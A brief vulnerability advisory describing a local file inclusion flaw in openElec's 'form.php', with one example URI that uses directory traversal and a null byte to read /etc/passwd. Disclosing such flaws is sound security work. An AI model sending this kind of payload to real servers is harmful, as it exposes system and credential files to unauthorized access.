openElec 'form.php' Local File Include Vulnerability

openElec 'form.php' Local File Include Vulnerability

Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/openelec/scr/form.php?obj=../../../../../../../etc/passwd%00